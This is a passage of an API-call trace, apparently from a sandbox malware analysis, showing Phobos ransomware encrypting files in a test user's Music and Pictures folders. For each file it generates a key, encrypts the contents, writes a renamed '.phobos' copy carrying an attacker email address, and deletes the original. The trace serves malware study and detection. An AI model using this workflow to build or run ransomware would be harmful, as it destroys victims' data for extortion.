nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0198.729] CryptDestroyKey (hKey=0xa32b68) returned 1 [0198.729] CloseHandle (hObject=0x16c) returned 1 [0198.729] CloseHandle (hObject=0x140) returned 1 [0198.729] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xLBOGNNUMVLleJAV6e.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xlbognnumvllejav6e.m4a")) returned 1 [0198.730] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.730] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0198.730] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.730] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.730] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=20) returned 1 [0198.730] CloseHandle (hObject=0x140) returned 1 [0198.730] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini")) returned 0x6 [0198.731] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.731] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.731] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.731] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.731] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0198.732] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32b68) returned 1 [0198.732] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.732] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x14, lpOverlapped=0x0) returned 1 [0198.733] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x20, dwBufLen=0x20 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x20) returned 1 [0198.733] WriteFile (in: hFile=0x16c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x20, lpOverlapped=0x0) returned 1 [0198.734] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0198.734] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.734] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0198.734] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.734] WriteFile (in: hFile=0x16c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0198.734] CryptDestroyKey (hKey=0xa32b68) returned 1 [0198.734] CloseHandle (hObject=0x140) returned 1 [0198.734] CloseHandle (hObject=0x16c) returned 1 [0198.734] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini")) returned 1 [0198.735] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.735] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-tI5Q3UB ena4QO 2w.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\-ti5q3ub ena4qo 2w.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0198.740] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=20494) returned 1 [0198.740] CloseHandle (hObject=0x16c) returned 1 [0198.740] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-tI5Q3UB ena4QO 2w.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\-ti5q3ub ena4qo 2w.bmp")) returned 0x20 [0198.740] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-tI5Q3UB ena4QO 2w.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\-ti5q3ub ena4qo 2w.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.740] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-tI5Q3UB ena4QO 2w.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\-ti5q3ub ena4qo 2w.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0198.740] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.740] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.740] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-tI5Q3UB ena4QO 2w.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\-ti5q3ub ena4qo 2w.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.741] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32b68) returned 1 [0198.741] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.741] ReadFile (in: hFile=0x16c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x500e, lpOverlapped=0x0) returned 1 [0198.743] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5010, dwBufLen=0x5010 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5010) returned 1 [0198.743] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x5010, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x5010, lpOverlapped=0x0) returned 1 [0198.745] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0198.745] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.745] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0198.745] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.745] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0198.745] CryptDestroyKey (hKey=0xa32b68) returned 1 [0198.745] CloseHandle (hObject=0x16c) returned 1 [0198.745] CloseHandle (hObject=0x140) returned 1 [0198.745] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-tI5Q3UB ena4QO 2w.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\-ti5q3ub ena4qo 2w.bmp")) returned 1 [0198.746] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.746] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6O7-m LH.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\6o7-m lh.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0198.775] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=99492) returned 1 [0198.776] CloseHandle (hObject=0x130) returned 1 [0198.776] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6O7-m LH.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\6o7-m lh.bmp")) returned 0x20 [0198.776] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6O7-m LH.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\6o7-m lh.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.776] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6O7-m LH.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\6o7-m lh.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0198.776] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.776] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.776] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6O7-m LH.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\6o7-m lh.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.777] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa329e8) returned 1 [0198.777] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.777] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x184a4, lpOverlapped=0x0) returned 1 [0198.778] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x184b0, dwBufLen=0x184b0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x184b0) returned 1 [0198.779] WriteFile (in: hFile=0x15c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x184b0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x184b0, lpOverlapped=0x0) returned 1 [0198.781] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32aa8) returned 1 [0198.781] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.781] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0198.781] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0198.781] WriteFile (in: hFile=0x15c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0198.781] CryptDestroyKey (hKey=0xa329e8) returned 1 [0198.781] CloseHandle (hObject=0x130) returned 1 [0198.781] CloseHandle (hObject=0x15c) returned 1 [0198.782] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6O7-m LH.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\6o7-m lh.bmp")) returned 1 [0198.783] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.783] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BjX2-p.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bjx2-p.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.784] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=96177) returned 1 [0198.784] CloseHandle (hObject=0x15c) returned 1 [0198.784] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BjX2-p.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bjx2-p.png")) returned 0x20 [0198.784] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BjX2-p.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bjx2-p.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.784] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BjX2-p.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bjx2-p.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.785] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.785] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.785] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BjX2-p.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bjx2-p.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0198.785] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa329e8) returned 1 [0198.785] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.785] ReadFile (in: hFile=0x15c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x177b1, lpOverlapped=0x0) returned 1 [0198.796] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x177c0, dwBufLen=0x177c0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x177c0) returned 1 [0198.797] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x177c0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x177c0, lpOverlapped=0x0) returned 1 [0198.799] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0198.799] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.799] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0198.799] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.800] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0198.800] CryptDestroyKey (hKey=0xa329e8) returned 1 [0198.800] CloseHandle (hObject=0x15c) returned 1 [0198.800] CloseHandle (hObject=0x130) returned 1 [0198.800] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BjX2-p.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bjx2-p.png")) returned 1 [0198.803] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.803] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cm9D EYqaX c.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cm9d eyqax c.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0198.804] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=5447) returned 1 [0198.804] CloseHandle (hObject=0x130) returned 1 [0198.804] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cm9D EYqaX c.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cm9d eyqax c.png")) returned 0x20 [0198.804] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cm9D EYqaX c.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cm9d eyqax c.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cm9D EYqaX c.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cm9d eyqax c.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0198.804] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.804] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cm9D EYqaX c.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cm9d eyqax c.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.805] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa329e8) returned 1 [0198.805] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.805] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1547, lpOverlapped=0x0) returned 1 [0198.807] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1550, dwBufLen=0x1550 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1550) returned 1 [0198.807] WriteFile (in: hFile=0x15c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1550, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1550, lpOverlapped=0x0) returned 1 [0198.808] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0198.808] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.808] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0198.808] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.808] WriteFile (in: hFile=0x15c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0198.808] CryptDestroyKey (hKey=0xa329e8) returned 1 [0198.808] CloseHandle (hObject=0x130) returned 1 [0198.808] CloseHandle (hObject=0x15c) returned 1 [0198.808] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cm9D EYqaX c.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cm9d eyqax c.png")) returned 1 [0198.809] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.809] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.810] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=504) returned 1 [0198.810] CloseHandle (hObject=0x15c) returned 1 [0198.810] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini")) returned 0x26 [0198.811] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 